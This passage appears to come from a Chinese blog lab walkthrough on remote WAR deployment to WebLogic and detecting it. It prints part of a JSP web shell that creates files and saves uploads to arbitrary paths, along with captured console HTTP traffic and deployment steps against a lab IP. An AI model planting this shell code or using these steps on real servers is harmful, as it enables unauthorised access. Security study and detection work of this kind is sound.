if(!strType.equals("") && !(strF==null || strF.equals("")))
{
File f_new=new File(strF);
if(strType.equals("File") && !f_new.createNewFile())
sbNewFile.append(strF+" 文件创建失败");
if(strType.equals("Dir") && !f_new.mkdirs())
sbNewFile.append(strF+" 目录创建失败");
}
else
{
sbNewFile.append("<p><font color=red>建立文件或目录出错。</font>");
}
}
if((request.getContentType()!= null) && (request.getContentType().toLowerCase().startsWith("multipart")))
{
String tempdir=".";
boolean error=false;
response.setContentType("text/html");
sbNewFile.append("<p><font color=red>建立文件或目录出错。</font>");
HttpMultiPartParser parser = new HttpMultiPartParser();
int bstart = request.getContentType().lastIndexOf("oundary=");
String bound = request.getContentType().substring(bstart + 8);
int clength = request.getContentLength();
Hashtable ht = parser.processData(request.getInputStream(), bound, tempdir, clength);
if (ht.get("cqqUploadFile") != null)
{
FileInfo fi = (FileInfo) ht.get("cqqUploadFile");
File f1 = fi.file;
UplInfo info = UploadMonitor.getInfo(fi.clientFileName);
if (info != null && info.aborted)
{
f1.delete();
request.setAttribute("error", "Upload aborted");
}
else
{
String path = (String) ht.get("path");
if(path!=null && !path.endsWith("\"))
path = path + "\";
if (!f1.renameTo(new File(path + f1.getName())))
{
request.setAttribute("error", "Cannot upload file.");
error = true;
f1.delete();
}
}
}
}
%>
-----------------------------8434166712903
Content-Disposition: form-data; name="AppApplicationInstallPortletuploadPlanPath"; filename=""
Content-Type: application/octet-stream
-----------------------------8434166712903
Content-Disposition: form-data; name="AppApplicationInstallPortletfrsc"
0x062430ecab863931868d682e81a64437e4490c23def60129
-----------------------------8434166712903--
HTTP/1.1 200 OK
Cache-Control: no-cache,no-store,max-age=0
Cache-Control: no-cache,no-store,max-age=0
Cache-Control: no-cache,no-store,max-age=0
Cache-Control: no-cache,no-store,max-age=0
Connection: close
Date: Mon, 22 Feb 2021 06:20:53 GMT
Pragma: No-cache
Pragma: No-cache
Pragma: No-cache
Pragma: No-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 37476
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><meta http-equiv="Content-Script-Type" content="text/javascript"><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><title>Install Application Assistant - base_domain - WLS Console</title><link rel="stylesheet" type="text/css" href="/console/framework/skeletons/wlsconsole/css/layout.css"><script src="/console/framework/skeletons/wlsconsole/js/buttons.js" type="text/javascript"></script><script src="/console/framework/skeletons/wlsconsole/js/util.js" type="text/javascript"></script><link rel="stylesheet" type="text/css" href="/console/framework/skins/wlsconsole/css/general.css"><link rel="stylesheet" type="text/css" href="/console/framework/skins/wlsconsole/css/menu.css"><link rel="stylesheet" type="text/css" href="/console/framework/skins/wlsconsole/css/window.css"><link rel="stylesheet" type="text/css" href="/console/framework/skins/wlsconsole/css/console.css"><link rel="stylesheet" type="text/css" href="/console/css/content.css"><script src="/console/javascript/consoleUtil.js" type="text/javascript"></script><script src="/console/javascript/console-help.js" type="text/javascript"></script><script src="/console/javascript/recorder.js" type="text/javascript"></script><link rel="stylesheet" type="text/css" href="/console/css/changemgmt.css"><link rel="stylesheet" type="text/css" href="/console/css/forms.css"><script src="/console/javascript/changemgmt.js" type="text/javascript"></script><script src="/console/javascript/form.js" type="text/javascript"></script><script src="/console/javascript/PredicateEditor.js" type="text/javascript"></script><script src="/console/javascript/table.js" type="text/javascript"></script><script src="/console/javascript/portletrefresh.js" type="text/javascript"></script><script src="/console/javascript/ButtonMenu.js" type="text/javascript"></script><script src="/console/javascript/chooser.js" type="text/javascript"></script><link rel="stylesheet" type="text/css" href="/console/css/navtree.css"><script src="/console/javascript/tree.js" type="text/javascript"></script><link rel="stylesheet" type="text/css" href="/console/css/quicklinks.css"><link rel="stylesheet" type="text/css" href="/console/css/systemstatus.css"></head><body><div class="wlsc-header"><div id="console-header-logo"><a href="#repetitive_links"><img src="images/spacer.gif" alt="Skip repetitive links "></a><div><a href="http://192.168.52.128:7001/console/console.portal?_nfpb=true&_pageLabel=HomePage1" title="WebLogic Server Administration Console Home"><img src="framework/skins/wlsconsole/images/Branding_WeblogicConsole.gif" id="console-title" alt="WebLogic Server Administration Console Home "></a></div></div><div id="global-links"><span id="pageStatus"><img src="framework/skins/wlsconsole/images/pageIdle.gif" id="pageIdle" title="Idle" alt="Idle"><img src="framework/skins/wlsconsole/images/pageBusy.gif" id="pageBusy" title="Busy" alt="Busy"></span></div><div id="header-trans"><img src="framework/skins/wlsconsole/images/gradient-white-none.png" alt=""></div></div><div id="Home" class="wlsc-book"><div class="wlsc-book-content"><div id="page" class="wlsc-page"><div class="wlsc-2col-layout"><div id="console-content-col"><div id="console-content-col-inner"><div id="ToolbarBook" class="none"><div class="wlsc-book-content"><div id="ToolbarPage" class="wlsc-page"><div id="portlet_toolbar" class="wlsc-window "><div class="wlsc-window-content">
后面基本就是一路Next,详细的操作参考:https://www.cnblogs.com/DFX339/p/8515200.html
部署完成
开始配置系统环境
http://192.168.52.128:7001/console/console.portal?_nfpb=true&_pageLabel=CoreServerServerTablePage
选择协议,然后选择HTTP
再次点击部署(Deployments)
http://192.168.52.128:7001/console/console.portal?_nfpb=true&_pageLabel=AppDeploymentsControlPage
然后就可以访问项目了 http://IP:PORT/ProjectName
http://192.168.52.128:7001/test3693/
程序员灯塔
转载请注明原文链接:三种远程部署war包检测
转载请注明原文链接:三种远程部署war包检测
